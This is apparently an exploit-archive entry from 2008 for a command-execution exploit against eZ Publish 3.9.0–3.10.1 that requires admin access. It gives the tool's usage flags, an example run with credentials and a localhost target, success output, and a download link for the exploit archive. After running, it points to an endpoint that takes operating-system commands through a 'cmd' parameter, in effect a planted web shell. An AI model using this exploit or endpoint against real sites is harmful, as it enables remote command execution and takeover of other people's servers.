eZ Publish 3.9.0-3.9.5-3.10.1 Command Execution Exploit (admin req)

2008-12-11 18:30:03

/*
eZ Publish OS Commanding executing exploit by s4avrd0w [[email protected]]
Versions affected 3.x

* tested on version 3.9.0, 3.9.5, 3.10.1

usage:

# ./eZPublish_abuse_of_functionality_zero_day -u=username -p=password -s=EZPublish_server

The options are required:

-u Login of the exists admin on eZ Publish
-p Admin password on eZ Publish
-s Target eZ Publish admin interface

example:

# ./eZPublish_abuse_of_functionality_zero_day -u=toor -p=P@ssw0rd -s=http://127.0.0.1/ezwebin_site_admin/
[+] Exploit successfully sending
[+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd=<OScommand>
*/

http://milw0rm.com/sploits/2008-eZPublish_abuse_of_functionality_zero_day.zip

#

Fixes

No fixes

In order to submit a new fix you need to be registered.